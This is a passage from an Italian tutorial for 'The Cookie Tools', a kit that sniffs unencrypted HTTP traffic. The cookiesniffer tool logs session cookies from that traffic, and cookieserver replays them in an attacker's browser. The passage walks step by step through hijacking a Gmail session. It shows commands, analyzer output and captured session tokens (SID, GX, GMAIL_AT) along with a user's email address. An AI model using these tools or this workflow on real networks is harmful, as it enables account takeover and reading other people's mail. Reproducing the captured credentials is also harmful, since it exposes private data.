1195641106.113463 Set-Cookie: GMAIL_RTT=121; expires=Tuesday, 2-Feb-2020 02:02:02 GMT; path=/; domain=google.com;
1195641106.113463 Set-Cookie: GMAIL_LOGIN=T1195636734978/1195636734978/1195636738633; expires=Tuesday, 2-Feb-2020 02:02:02 GMT; path=/; domain=google.com;
1195641110.984025 Link: http://mail.google.com/mail/channel/bind?at=xn3j37i0ev7wcknl8mwn6svd7dl85s&VER=5&it=6425&SID=B7BBE82A5077EC37&RID=89043&TYPE=terminate&zx=eh281lp7e4it
1195641110.984025 Set-Cookie: __utma=173272373.1523618165.1195636735.1195636735.1195636735.1; expires=Tuesday, 2-Feb-2020 02:02:02 GMT; path=/; domain=google.com;
1195641110.984025 Set-Cookie: __utmc=173272373; expires=Tuesday, 2-Feb-2020 02:02:02 GMT; path=/; domain=google.com;
1195641110.984025 Set-Cookie: __utmz=173272373.1195636735.1.1.utmccn=(referral)|utmcsr=mail.google.com|utmcct=/mail/|utmcmd=referral; expires=Tuesday, 2-Feb-2020 02:02:02 GMT; path=/; domain=google.com;
1195641110.984025 Set-Cookie: GMAIL_STAT_PENDING=/S:a=lc&sv=tl&ev=tl&s=25&t=1637&w=623&; expires=Tuesday, 2-Feb-2020 02:02:02 GMT; path=/; domain=google.com;
1195641110.984025 Set-Cookie: GX=DQAAAG8AAACjafoPn5mnL_8MJW1nVv5YXx3DKtO9FNCcs9XOGqKcKQ3sUbDCPajbczMVOxCS39raD7wjL5G000VJRQ-BvBJtwX-t1mWdXCyGp9LOWfrnjGeSx5OpA2o2JFJDSRF_puHr_a7stqXQjUqdZGBJkB9v; expires=Tuesday, 2-Feb-2020 02:02:02 GMT; path=/; domain=google.com;
1195641110.984025 Set-Cookie: S=gmail=L0lNcfSZrxf9zS0_bnoG1g:gmail_yj=j8AXLSaEdnrRWXL9Mck0Yw:gmproxy=aULplbxy37k:gmproxy_yj=Ozc4CqRZ6RY:gmproxy_yj_sub=eGfjrGPBT6Y; expires=Tuesday, 2-Feb-2020 02:02:02 GMT; path=/; domain=google.com;
1195641110.984025 Set-Cookie: GMAIL_AT=xn3j37i0ev7wcknl8mwn6svd7dl85s; expires=Tuesday, 2-Feb-2020 02:02:02 GMT; path=/; domain=google.com;
1195641110.984025 Set-Cookie: gmailchat=charlieroot69@gmail.com/138671; expires=Tuesday, 2-Feb-2020 02:02:02 GMT; path=/; domain=google.com;
1195641110.984025 Set-Cookie: TZ=-60; expires=Tuesday, 2-Feb-2020 02:02:02 GMT; path=/; domain=google.com;
1195641110.984025 Set-Cookie: GMAIL_RTT=121; expires=Tuesday, 2-Feb-2020 02:02:02 GMT; path=/; domain=google.com;
1195641110.984025 Set-Cookie: GMAIL_LOGIN=T1195636734978/1195636734978/1195636738633; expires=Tuesday, 2-Feb-2020 02:02:02 GMT; path=/; domain=google.com;
1195641110.984025 Set-Cookie: SID=DQAAAGwAAACE2b7aSYrQhQLPo-6CPWyHxwgtAQHWvHMkNNlhgioxnGVZ94fyOyP0DHOY9vDqO9uOQSgvNO3B3g4beCKYNbek6PctrTdrUjNKfGuFk_Z_kdFYB72TlLsL8HututH5PNMSHkFXIC8A0510ugE1g0qF; expires=Tuesday, 2-Feb-2020 02:02:02 GMT; path=/; domain=google.com;
xenion@gollum:~/dev/cookietools$

Ciascuna linea nel session file ha un time-stamp, abbastanza rindondante. Questo permette di fare il sort (ricordati di usare l'opzione -n per abilitare il "numerical value sorting" !!) dei logs di piu' connessioni in modo semplice, considerando i time-stamps. Questo e' un esempio (prendi l'ultimo valore (= il valore attuale) del cookie con nome GX):

xenion@gollum:~/dev/cookietools$ cat logz/192.168.1.2-*.session | sort -n | grep "Set-Cookie: GX" | tail -1
1195641110.984025 Set-Cookie: GX=DQAAAG8AAACjafoPn5mnL_8MJW1nVv5YXx3DKtO9FNCcs9XOGqKcKQ3sUbDCPajbczMVOxCS39raD7wjL5G000VJRQ-BvBJtwX-t1mWdXCyGp9LOWfrnjGeSx5OpA2o2JFJDSRF_puHr_a7stqXQjUqdZGBJkB9v; expires=Tuesday, 2-Feb-2020 02:02:02 GMT; path=/; domain=google.com;
xenion@gollum:~/dev/cookietools$

Come funziona

I pacchetti sniffati vengono gestiti da libnids che ricostruisce ciascuna connessione tcp. cookiesniffer ricostruisce anche le connessioni tcp gia' esistenti inserendo forzatamente in libnids dei tcp three-way handshakes costruiti appositamente. Ciascun pacchetto e' anche gestito individualmente da un insieme di protocol dissectors. Questo avviene perche' libnids non ricostruira' le connessioni tcp con alcuni pacchetti persi (causando quindi una perdita di informazioni). Questo puo' comportare alcuni duplicati nei logs ma non e' un problema, i time-stamps indicheranno sempre l'ultimo valore valido di ciascun cookie. Come scritto nell'rfc2616 (Hypertext Transfer Protocol - HTTP/1.1) sezione 4.4, il transfer-length del corpo di un messaggio HTTP puo' essere determinato in 5 modi. cookiesniffer supporta i modi 1, 3, 5 ma non 2 ("chunked" transfer-coding) e 4 (media type "multipart/byteranges"). Con 2 e 4 lo stato delle connessioni cambia da "synchronized" a "desynchronized". Le connessioni ritornato "synchronized" con il primo pacchetto che inizia con un messaggio HTTP valido (questa situazione viene chiamata "resynchronization").

Gli analyzers

Nella directory bin/analyzers ci sono alcuni script Bash che possono aiutarti ad analizzare velocemente i logs di cookiesniffer. Questa e' una loro breve descrizione:

• vision.sh: per ciascun client riconosciuto (oppure per un client specificato) torna la lista dei link visitati, la lista degli host con cookies ed il valore dei cookies (l'ultimo di ciascuno). Questo e' lo script piu' utile (e lento).
• links.sh: per ciascun client riconosciuto torna la lista degli host con cookies e la lista dei link visitati.
• names.sh: per ciascun client riconosciuto e per ciascun host con cookies torna la lista dei nomi dei cookies per ciascun host.
• occurrences.sh: per ciascun client riconosciuto torna la lista delle occorrenze dei valori di ciascun cookie (da utilizzare solo se non ci sono conflitti fra i nomi dei cookies di differenti host con cookies, in tal caso i risultati sono uniti e da considerare sbagliati)

Questo e' un esempio di esecuzione di vision.sh:

xenion@gollum:~/dev/cookiestools$ bin/analyzers/vision.sh logz/
======================== Client 192.168.1.2 ========================

----- Links -----
link[192.168.1.2] http://mail.google.com/mail/channel/bind?at=xn3j37i0ev7wcknl8mwn6svd7dl85s&VER=5&it=9&SID=B7BBE82A5077EC37&RID=89041&zx=it9k92y1rgwv&t=1
link[192.168.1.2] http://mail.google.com/mail/?ui=2&ik=a70d6eca1f&view=tl&start=0&num=70&rt=h&search=inbox
link[192.168.1.2] http://mail.google.com/mail/?ui=2&ik=a70d6eca1f&view=ad&ak=s6cmkdkein1jmp2a91ddp8yun54n24w
link[192.168.1.2] http://mail.google.com/mail/channel/bind?at=xn3j37i0ev7wcknl8mwn6svd7dl85s&VER=5&it=1552&SID=B7BBE82A5077EC37&RID=89042&zx=d7qazjopodh6&t=1
link[192.168.1.2] http://mail.google.com/mail/channel/bind?at=xn3j37i0ev7wcknl8mwn6svd7dl85s&VER=5&it=6425&SID=B7BBE82A5077EC37&RID=89043&TYPE=terminate&zx=eh281lp7e4it
link[192.168.1.2] http://bbc.com/
link[192.168.1.2] http://www.bbc.co.uk/?ok
link[192.168.1.2] http://secure-uk.imrworldwide.com/cgi-bin/m?rnd=1195641113793&ci=bbc&cg=0&sr=1280x1024&cd=24&lg=en-US&je=y&ck=y&tz=1&ct=&hp=&tl=BBC%20-%20bbc.co.uk%20homepage%20-%20Home%20of%20the%20BBC%20on%20the%20Internet&si=http%3A//www.bbc.co.uk/%3Fok&rp=
link[192.168.1.2] http://ad.uk.doubleclick.net/adx/bbccom.live.site.www/bbc_homepage_int;sectn=nonnews;nnsec=homepage_int;callback=BBCComAds.store;requestId=mpu;dcmt=application/x-javascript;sz=250x250;tile=4;ord=59391655229326?
link[192.168.1.2] http://ad.uk.doubleclick.net/adx/bbccom.live.site.www/bbc_homepage_int;sectn=nonnews;nnsec=homepage_int;callback=BBCComAds.store;requestId=bottom;dcmt=application/x-javascript;sz=468x60;tile=3;ord=59391655229326?
link[192.168.1.2] http://ad.uk.doubleclick.net/adx/bbccom.live.site.www/bbc_homepage_int;sectn=nonnews;nnsec=homepage_int;callback=BBCComAds.store;requestId=skyscraper;dcmt=application/x-javascript;sz=160x600;tile=2;ord=59391655229326?
link[192.168.1.2] http://ad.uk.doubleclick.net/adx/bbccom.live.site.www/bbc_homepage_int;sectn=nonnews;nnsec=homepage_int;callback=BBCComAds.store;requestId=top;dcmt=application/x-javascript;sz=728x90;tile=1;ord=59391655229326?
link[192.168.1.2] http://ad.doubleclick.net/noidadx/bbccom.live.site.www/bbc_homepage_int;sectn=nonnews;nnsec=homepage_int;callback=BBCComAds.store;requestId=top;dcmt=application/x-javascript;sz=728x90;tile=1;ord=59391655229326?

----- Cookies -----
hosts[192.168.1.2:] co.uk doubleclick.net google.com imrworldwide.com 

names[192.168.1.2:co.uk] BBC-UID BBCNewsAudience 
values[192.168.1.2:co.uk] 'BBC-UID'='2497244450a76963803bdc1cf0f0a902643cab68609010733b5accb5b3a90ab90Mozilla%2f5%2e0%20%28X11%3b%20U%3b%20Linux%20i686%3b%20en%2dUS%3b%20rv%3a1%2e8%2e1%2e8%29%20Gecko%2f20071004%20Iceweasel%2f2%2e0%2e0%2e8%20%28Debian%2d2%2e0%2e0%2e8%2d1%29'
values[192.168.1.2:co.uk] 'BBCNewsAudience'='International'

names[192.168.1.2:doubleclick.net] id test_cookie 
values[192.168.1.2:doubleclick.net] 'id'='800001136db5ff0'
values[192.168.1.2:doubleclick.net] 'test_cookie'='CheckForPermission'

names[192.168.1.2:google.com] GMAIL_AT GMAIL_LOGIN GMAIL_RTT GMAIL_STAT_PENDING GX S SID TZ __utma __utmc __utmz gmailchat 
values[192.168.1.2:google.com] 'GMAIL_AT'='xn3j37i0ev7wcknl8mwn6svd7dl85s'
values[192.168.1.2:google.com] 'GMAIL_LOGIN'='T1195636734978/1195636734978/1195636738633'
values[192.168.1.2:google.com] 'GMAIL_RTT'='121'
values[192.168.1.2:google.com] 'GMAIL_STAT_PENDING'='/S:a'
values[192.168.1.2:google.com] 'GX'='DQAAAG8AAACjafoPn5mnL_8MJW1nVv5YXx3DKtO9FNCcs9XOGqKcKQ3sUbDCPajbczMVOxCS39raD7wjL5G000VJRQ-BvBJtwX-t1mWdXCyGp9LOWfrnjGeSx5OpA2o2JFJDSRF_puHr_a7stqXQjUqdZGBJkB9v'
values[192.168.1.2:google.com] 'S'='gmail'
values[192.168.1.2:google.com] 'SID'='DQAAAGwAAACE2b7aSYrQhQLPo-6CPWyHxwgtAQHWvHMkNNlhgioxnGVZ94fyOyP0DHOY9vDqO9uOQSgvNO3B3g4beCKYNbek6PctrTdrUjNKfGuFk_Z_kdFYB72TlLsL8HututH5PNMSHkFXIC8A0510ugE1g0qF'
values[192.168.1.2:google.com] 'TZ'='-60'
values[192.168.1.2:google.com] '__utma'='173272373.1523618165.1195636735.1195636735.1195636735.1'
values[192.168.1.2:google.com] '__utmc'='173272373'
values[192.168.1.2:google.com] '__utmz'='173272373.1195636735.1.1.utmccn'
values[192.168.1.2:google.com] 'gmailchat'='charlieroot69@gmail.com/138671'

names[192.168.1.2:imrworldwide.com] IMRID V5 
values[192.168.1.2:imrworldwide.com] 'IMRID'='R0QHlz699OQAAT@qiAI'
values[192.168.1.2:imrworldwide.com] 'V5'='AStfMFklAAMYVFBNBz4jIz00OQYjK1InHlIk1A??'

xenion@gollum:~/dev/cookiestools$

Dipendenze, compilazione ed esecuzione

Le librerie richieste sono libpcap (≥0.7), libnet (≥1.1) e libnids (≥1.20). In debian, devi installare i seguenti pacchetti (versione uguale o superiore):

• libnids1
• libnids-dev
• libnet1
• libnet1-dev
• libpcap0.7
• libpcap0.7-dev

Per compilare, semplicemente "make" nella top directory dei cookietools. I path degli eseguibili:

• cookiesniffer: bin/cookiesniffer
• log analyzers: bin/analyzers/vision.sh bin/analyzers/links.sh bin/analyzers/names.sh bin/analyzers/occurrences.sh

cookieserver

Con cookieserver puoi impersonare i cookies di qualcun' altro nel tuo browser utilizzando i logs di cookiesniffer (in pochi secondi). Questo attacco e' anche chiamato "side-jacking", "cookie replay attack" e "HTTP session hijacking" ma probabilmente mi sto perdendo il nome piu' 1337 :P. Questo e' un problema conosciuto da 10 anni ma che e' ancora (anche troppo) funzionante.

Utilizzo

I due parametri obbligatori sono la directory dei logs di cookiesniffer e l'ip (indirizzo ipv4) dell'utente web che si vuole impersonare. Soltanto i suoi cookies verranno considerati. Questo e' un esempio di esecuzione (impersona l'utente web con ip 192.168.1.2 utilizzando 'logz' come directory dei logs di cookiesniffer):

xenion@gollum:~/dev/cookietools$ bin/cookieserver/startup.sh logz 192.168.1.2
checking for: socat sed grep egrep cut cat head sort tail uniq 
checking log directory...
Client: '192.168.1.2' Logdir: 'logz'
Cookie Server: 127.0.0.1:8181
tmp files will be generated at each request (slower but dynamic)
Listening...

Puoi eseguire cookieserver mentre cookiesniffer sta raccogliendo informazioni dalla rete, il valore dei cookies verra' aggiornato in accordo con il loro time-stamp. Opzionalmente puoi aggiungere un terzo parametro, la stringa costante 'static'. Questa forzera' cookieserver a generare informazioni statiche, dovresti abilitare questa opzione solo quando l'informazione che ti interessa e' costante e non cambia nel tempo. Questo e' un esempio:

xenion@gollum:~/dev/cookietools$ bin/cookieserver/startup.sh logz 192.168.1.2 static
checking for: socat sed grep egrep cut cat head sort tail uniq 
checking log directory...
Client: '192.168.1.2' Logdir: 'logz'
Cookie Server: 127.0.0.1:8181
tmp files will be generated only once (faster but static)
Building tmp files... (logdir: 'logz' client: '192.168.1.2')
Listening...

Puoi anche gestire scenari complessi modificando gli script Bash bin/cookieserver/subset.sh e bin/cookieserver/build_tmp.sh. Dopo aver fatto partire cookieserver, avvia il tuo browser e imposta il proxy http a 127.0.0.1:8181. Il browser raccomandato e' Firefox con il plug-in SwitchProxy. Vai all'URL http://x dove x puo' essere qualsiasi cosa, la pagina HTML risultante e' la stessa(generata da cookieserver). Questa e' la struttura della pagina HTML che dovresti vedere:

CookieServer
Logdir: 'logz'
Client: '192.168.1.2'
Faking host: x
Cookie hosts (12):
    * google.com
    * ...
Links (21):
    * http://mail.google.com/mail/...
    * ...
Set-Cookies (16):
Set-Cookie: GMAIL_AT=...; path=/; domain=google.com;
Set-Cookie: ...
EOF

Una veloce descrizione: Logdir e Client sono i parametri di input, il Faking host e' l'hostname che cookieserver sta falsando, Cookie hosts e' la lista degli host con cookies, Links e' la lista delle URL richieste e Set-Cookies e' la lista degli header Set-Cookie presenti negli header HTTP della pagina attualmente visualizzata. Visitando esattamente l'URL 'http://x' non verra' settato alcun cookie perche' non esiste un cookie con tale domain. Ma quando visiti le URL proposte nella lista Cookie hosts ci sara' sempre qualche dominio con quel domain ed i rispettivi cookies verranno settati nel tuo browser (sovrascrivendoli se ci sono gia'). Nell'esempio, se visiti l'URL http://google.com il cookie GMAIL_AT (ed altri) verra' settato. Ora, puoi usare i cookies che hai settato semplicemente reimpostando la configurazione originale del proxy http nel tuo browser.

Come funziona

E' un insieme di script Bash che implementano un semplice web server HTTP. Le connessioni TCP sono gestite con socat. Ciascuna risposta HTTP include gli header Set-Coookie che tu vedi nella lista Set-Cookies.

Dipendenze ed esecuzione

Sono richiesti i comandi standard di UNIX sed, grep, egrep, cut, cat, head, sort, tail, uniq. Devi anche avere la shell bash e socat, un tool simile a netcat ma molto piu' potente. E' anche consigliato l'uso del browser Firefox con il plug-in SwitchProxy. Il path dell'eseguibile:

• cookieserver: bin/cookieserver/startup.sh

Attacchiamo Gmail

Come dicevo nell'introduzione, i servizi di Google di default sono accessibili via HTTP, in chiaro. Qui prendiamo come esempio Gmail ed i suoi cookies, li analizzeremo e poi li useremo per attuare il cookie replay attack. Si parte... eseguiamo cookiesniffer mentre stiamo controllando la posta di un account Gmail:

xenion@gollum:~/dev/cookietools$ mkdir logz
xenion@gollum:~/dev/cookietools$ sudo bin/cookiesniffer -dlogz -i eth0
 + cookiesniffer of The Cookie Tools v0.3 running here!
 + pid: 4427, date/time: 30/11/2007#16:05:42
 + Configuration
   + INPUT
     Packet source: iface 'eth0'
     Force datalink header length: disabled
   + OUTPUT
     Output directory: 'logz'
     Logfile: 'logz/0.txt'
     Save pcap: disabled
     stdout logging: enabled
     Syslog logging: disabled
     Be verbose: disabled
   + SELECT
     Sniff in promiscuous mode: disabled
     Add pcap filter: disabled
   + EXECUTION
     Running as user/group: root/root
     Running daemonized: disabled
   + MISC
     Single packet handling: enabled
 * You can dump stats sending me a SIGUSR2 signal
 * Reading packets...
 ! observing HTTP conn: 192.168.1.2:41434 > 72.14.221.83:80
 ! observing HTTP conn: 192.168.1.2:41435 > 72.14.221.83:80
 ! observing HTTP conn: 192.168.1.2:33376 > 209.85.129.104:80
 ! observing HTTP conn: 192.168.1.2:45717 > 66.249.93.189:80
 ! observing HTTP conn: 192.168.1.2:41438 > 72.14.221.83:80
 ! observing HTTP conn: 192.168.1.2:41439 > 72.14.221.83:80
 ! observing HTTP conn: 192.168.1.2:41442 > 72.14.221.83:80
 ! observing HTTP conn: 192.168.1.2:41441 > 72.14.221.83:80
 ! observing HTTP conn: 192.168.1.2:41440 > 72.14.221.83:80
 ! observing HTTP conn: 192.168.1.2:41444 > 72.14.221.83:80
 ! observing HTTP conn: 192.168.1.2:41443 > 72.14.221.83:80
 ! handling single HTTP pkt: 192.168.1.2:41434 > 72.14.221.83:80
 ! observing HTTP conn: 192.168.1.2:41445 > 72.14.221.83:80
 ! observing HTTP conn: 192.168.1.2:41446 > 72.14.221.83:80
 ! observing HTTP conn: 192.168.1.2:41447 > 72.14.221.83:80
 ! observing HTTP conn: 192.168.1.2:41448 > 72.14.221.83:80
 ! observing HTTP conn: 192.168.1.2:41449 > 72.14.221.83:80
 ! observing HTTP conn: 192.168.1.2:41450 > 72.14.221.83:80
 ! observing HTTP conn: 192.168.1.2:33391 > 209.85.129.104:80
 ! observing HTTP conn: 192.168.1.2:33392 > 209.85.129.104:80
 ! observing HTTP conn: 192.168.1.2:37506 > 72.14.221.147:80
 ! observing HTTP conn: 192.168.1.2:41455 > 72.14.221.83:80
 ! observing HTTP conn: 192.168.1.2:41456 > 72.14.221.83:80
--
Caught SIGINT signal (2), cleaning up...
--
 + Status
   Network Packets: 2264
   Active HTTP Connections: 2
   Closed HTTP Connections: 20
   Detected HTTP Connections: 22
   Saved Cookies: 170
   Sync HTTP Connections: 1
   Desync HTTP Connections: 1
   Resync HTTP Connections: 53

xenion@gollum:~/dev/cookietools$

Ok, sono abbastanza :) iniziamo con l'analisi... quali sono i nomi dei cookies?

xenion@gollum:~/dev/cookietools$ bin/analyzers/names.sh logz/
======================== Client 192.168.1.2 ========================

----- Cookies under google.com -----
GMAIL_AT
GMAIL_IMP
GMAIL_LOGIN
GMAIL_RTT
GMAIL_STAT
GMAIL_STAT_PENDING
GX
PREF
S
SID
TZ
__utma
__utmb
__utmc
__utmx
__utmz
gmailchat

xenion@gollum:~/dev/cookietools$

Quali sono le occorrenze dei loro valori?

xenion@gollum:~/dev/cookietools$ bin/analyzers/occurrences.sh logz/     
======================== Client 192.168.1.2 ========================

----- GMAIL_AT -----
    151 GMAIL_AT=xn3j2xo9rptl0x2dpylih9ot3o84x5;

----- GMAIL_IMP -----
      7 GMAIL_IMP=EXPIRED;
      1 GMAIL_IMP=bf-i%2Fd-1280-718%2Ffn-n;
      1 GMAIL_IMP=fn-n%2Ftl-v%2Ftl-f%2Fcv-v%2Fcv-pfn-0%2Fcv-p%2Ffn-n%2Ftl-v%2Ftl-f%2Ftl-v;
      4 GMAIL_IMP=fn-n;
      1 GMAIL_IMP=tl-v%2Ftl-f%2Ftl-v;
      4 GMAIL_IMP=tl-v;

----- GMAIL_LOGIN -----
    150 GMAIL_LOGIN=T1196434986128/1196434986128/1196434991464;

----- GMAIL_RTT -----
    154 GMAIL_RTT=203;

----- GMAIL_STAT -----
      1 GMAIL_STAT=/S:a=i&sv=&ev=tl&s=339&t=6946&w=838&;
      1 GMAIL_STAT=/S:a=lc&sv=tl&ev=tl&s=13&t=1869&w=676&/S:a=lc&sv=tl&ev=tl&s=&t=460&w=&/S:a=o&sv=tl&ev=cv&s=&t=293&w=&/S:a=lc&sv=cv&ev=tl&s=&t=309&w=&;
      1 GMAIL_STAT=/S:a=lc&sv=tl&ev=tl&s=18&t=1601&w=538&/S:a=lc&sv=tl&ev=tl&s=&t=352&w=&;
      1 GMAIL_STAT=/S:a=lc&sv=tl&ev=tl&s=19&t=1717&w=887&;
      3 GMAIL_STAT=/S:a=lc&sv=tl&ev=tl&s=35&t=1066&w=533&;
      5 GMAIL_STAT=EXPIRED;

----- GMAIL_STAT_PENDING -----
      1 GMAIL_STAT_PENDING=/S:a=i&sv=&ev=tl&s=339&t=6946&w=838&;
      1 GMAIL_STAT_PENDING=/S:a=lc&sv=tl&ev=tl&s=13&t=1394&w=521&;
      2 GMAIL_STAT_PENDING=/S:a=lc&sv=tl&ev=tl&s=13&t=1869&w=676&/S:a=lc&sv=tl&ev=tl&s=&t=460&w=&/S:a=o&sv=tl&ev=cv&s=&t=293&w=&/S:a=lc&sv=cv&ev=tl&s=&t=309&w=&;
     15 GMAIL_STAT_PENDING=/S:a=lc&sv=tl&ev=tl&s=13&t=1869&w=676&/S:a=lc&sv=tl&ev=tl&s=&t=460&w=&/S:a=o&sv=tl&ev=cv&s=&t=293&w=&;
      1 GMAIL_STAT_PENDING=/S:a=lc&sv=tl&ev=tl&s=13&t=1869&w=676&/S:a=lc&sv=tl&ev=tl&s=&t=460&w=&;
      1 GMAIL_STAT_PENDING=/S:a=lc&sv=tl&ev=tl&s=13&t=1869&w=676&;
      1 GMAIL_STAT_PENDING=/S:a=lc&sv=tl&ev=tl&s=18&t=1601&w=538&/S:a=lc&sv=tl&ev=tl&s=&t=352&w=&;
      5 GMAIL_STAT_PENDING=/S:a=lc&sv=tl&ev=tl&s=19&t=1717&w=887&;
      6 GMAIL_STAT_PENDING=/S:a=lc&sv=tl&ev=tl&s=35&t=1066&w=533&;

----- GX -----
    151 GX=DQAAAG4AAADY6wZGiHdqH9flBuHSLJKHnUhZ6yeWAfnu-DibzNPedKvzrX65AGLN4gX7GUzWVDHUvRtia8U1d1iUTQDhEHJAuWw0H6zMM9cUu7GCJwo0xO9ti4h5ibJn3BY4cbpz9JaMORDyTMYPjNKExV3dZLo5;

----- N_T -----
      1 N_T=sess=5c47c2c1a80020e8&v=2&c=16388f3b&s=47502708&t=s:0:switchguide.html&sessref=;

----- PREF -----
    103 PREF=ID=38f52b118d41bca7:TM=1196435005:LM=1196435005:GM=1:S=MvwiRzegb4sU8QoM;

----- S -----
      1 S=gmail=pq4CRx_S_nhiN8Ty54kudg:gmail_yj=TmJzBxi_hhMAY7vQw4WYcA:gmproxy=qoxcaKJm38E:gmproxy_yj=s9jz8xbDNjY:gmproxy_yj_sub=04oV4_9l-aI;
    151 S=gmail=qceQSU5gZHnCMXxJU7dpGQ:gmail_yj=iZRj9Zr6FCLmONTwzQVOfQ:gmproxy=kw6RnIqPqPk:gmproxy_yj=xV-JZ7AkzZI:gmproxy_yj_sub=qNUhkKVM8SQ;

----- SID -----
    120 SID=DQAAAG4AAADHd05wGtOwIVsWGKHSt2zo_caJx3tnkV79W_hFfOPyAGZWGeztvy52-jR9BdSKchm2XlsNDUVEfAY3Dhod3auXUlilIvnTy_rDIPTbg5ZMHS08IWPEcGHwd6VfiBV7IYwr0j3r2uJoA30wbOzulUKP;

----- TZ -----
    154 TZ=-60;

----- __utma -----
    154 __utma=173272373.1028249202.1196434987.1196434987.1196434987.1;

----- __utmb -----
    154 __utmb=173272373;

----- __utmc -----
    154 __utmc=173272373;

----- __utmx -----
    154 __utmx=173272373.00000785162142287121:1:0-0-1-0-0-0;

----- __utmz -----
    154 __utmz=173272373.1196434987.1.1.utmccn=(direct)|utmcsr=(direct)|utmcmd=(none);

----- gmailchat -----
    150 gmailchat=charlieroot69@gmail.com/769423;

xenion@gollum:~/dev/cookietools$

Quali sono i link visitati? (tanti sono visitati indirettamente via javascript)

xenion@gollum:~/dev/cookietools$ bin/analyzers/links.sh logz/
======================== Client 192.168.1.2 ========================

----- Cookie hosts -----
google.com

----- Links -----
http://mail.google.com/mail/
http://mail.google.com/mail/?view=page&name=browser&ver=rladol3zq8xq
http://mail.google.com/mail/?ui=2&view=jsm&name=bjs&ids=16filwhcvscm8%2C13rprcb29qq2s&l=0
http://mail.google.com/mail/?ui=2&view=ss&ver=14ewxrjd6qumb
http://mail.google.com/mail/?ui=2&view=jsm&name=js&ids=l6215xh4rush%2C1qghp2pit7d3o%2C1gjpjcdlnnvrf%2Cxef1uw092kr9%2Cehspxdexmsdf%2C1j1bm9zyki3nm%2Cgvvmdl1m5azm%2Cpd1tigi3ijf3%2Cns2uitrnb4em%2C1pggb3m6xpyk%2Cjqp8z34i4bcs%2C8vml80v56hdp%2C10gzi33nu1at6%2C7h7d36vi93o1%2C1k1v2aui3j8q9&l=1
http://mail.google.com/mail/?ui=2&ik=a70d6eca1f&view=cbj
http://mail.google.com/mail/?ui=2&ik=a70d6eca1f&view=tl&start=0&num=70&init=1&rt=h&search=inbox
http://mail.google.com/mail/rc?a=af&c=fff1a8&w=4&h=4
http://mail.google.com/mail/rc?a=af&c=fff1a8&w=4&h=4
http://mail.google.com/mail/?ui=2&ik=a70d6eca1f&view=ad&ak=l45rs9a37xgdzta72mf4vl6btvla346
http://mail.google.com/mail/?ui=2&view=jsm&name=cv&ids=3gzy7oqkgypo
http://mail.google.com/mail/?ui=2&view=jsm&name=cw&ids=1dcbfpf7obz4a
http://www.google.com/setgmail?zx=vh7ug1-cwwdqw
http://mail.google.com/mail/?ui=2&view=jsm&name=cw&ids=1dcbfpf7obz4a
http://mail.google.com/mail/?ui=2&view=jsm&name=ch&ids=ulcv9njsj1gu
http://mail.google.com/mail/?ui=2&ik=a70d6eca1f&view=cv&th=1162b4bdf27ec66b&prf=1&usus=1&rt=j&search=inbox
http://mail.google.com/mail/channel/test?at=xn3j2xo9rptl0x2dpylih9ot3o84x5&VER=5&it=90&MODE=init&zx=v6bapv-361emi&t=1
http://chatenabled.mail.google.com/mail/images/cleardot.gif?at=xn3j2xo9rptl0x2dpylih9ot3o84x5&VER=5&it=140&zx=w87cfw-ysbz8h
http://mail.google.com/mail/channel/test?at=xn3j2xo9rptl0x2dpylih9ot3o84x5&VER=5&it=40&TYPE=xmlhttp&zx=pgsaxf-hleg5w&t=1
http://mail.google.com/mail/?ui=2&ik=a70d6eca1f&view=tl&start=0&num=70&rt=h&search=inbox
http://mail.google.com/mail/?ui=2&ik=a70d6eca1f&view=ad&ak=e4pvv0ppwmmfjgepkgk5e51s1636ati
http://mail.google.com/mail/?ui=2&ik=a70d6eca1f&view=au&rt=j
http://mail.google.com/mail/channel/bind?at=xn3j2xo9rptl0x2dpylih9ot3o84x5&VER=5&it=1412&RID=28319&CVER=3&zx=vab4un-tq15mu&t=1
http://mail.google.com/mail/?ui=2&view=jsm&name=cm&ids=dz7eovo1xhaj
http://mail.google.com/mail/channel/bind?at=xn3j2xo9rptl0x2dpylih9ot3o84x5&VER=5&it=2182&SID=96A8691006BBAC24&RID=28320&zx=qb2ff0-u2p57r&t=1
http://mail.google.com/mail/channel/bind?at=xn3j2xo9rptl0x2dpylih9ot3o84x5&VER=5&it=2175&RID=rpc&SID=96A8691006BBAC24&CI=0&AID=8&TYPE=xmlhttp&zx=ulbq1b-tnwiv4&t=1
http://mail.google.com/mail/?ui=2&view=jsm&name=e&ids=1ngmlz0gj674u
http://mail.google.com/mail/?ui=2&ik=a70d6eca1f&view=au&rt=j
http://mail.google.com/mail/?ui=2&ik=a70d6eca1f&view=cv&fs=1&tf=1&ver=4pcijug8lfzsh3spvl71c9kfl
http://mail.google.com/mail/?ui=2&ik=a70d6eca1f&view=cw&fs=1&tf=1&ver=4pcijug8lfzsh3spvl71c9kfl
http://mail.google.com/mail/?ui=2&ik=a70d6eca1f&view=cm&fs=1&tf=1&ver=4pcijug8lfzsh3spvl71c9kfl
http://mail.google.com/mail/channel/bind?at=xn3j2xo9rptl0x2dpylih9ot3o84x5&VER=5&it=187&SID=96A8691006BBAC24&RID=28321&zx=qm8vej-gct1wq&t=1
http://mail.google.com/mail/?ui=2&ik=a70d6eca1f&view=tl&start=0&num=70&rt=h&search=all
http://mail.google.com/mail/?ui=2&ik=a70d6eca1f&view=cv&th=1162b4bdf27ec66b&prf=1&rt=j&search=all
http://mail.google.com/mail/?ui=2&ik=a70d6eca1f&view=cv&th=1162b4bdf27ec66b&prf=1&rt=j&search=all
http://mail.google.com/mail/?ui=2&ik=a70d6eca1f&view=tl&start=0&num=70&rt=h&search=spam
http://mail.google.com/mail/rc?a=af&c=cccccc&w=4&h=4
http://mail.google.com/mail/?ui=2&ik=a70d6eca1f&view=ad&th=1162b4bdf27ec66b&search=inbox
http://mail.google.com/mail/channel/bind?at=xn3j2xo9rptl0x2dpylih9ot3o84x5&VER=5&it=1510&SID=96A8691006BBAC24&RID=28322&zx=ph8xes-yj2vnf&t=1
http://mail.google.com/support/bin/static.py?page=switchguide.html&switch=1&hl=en&utm_source=wel&utm_medium=wel&utm_campaign=en
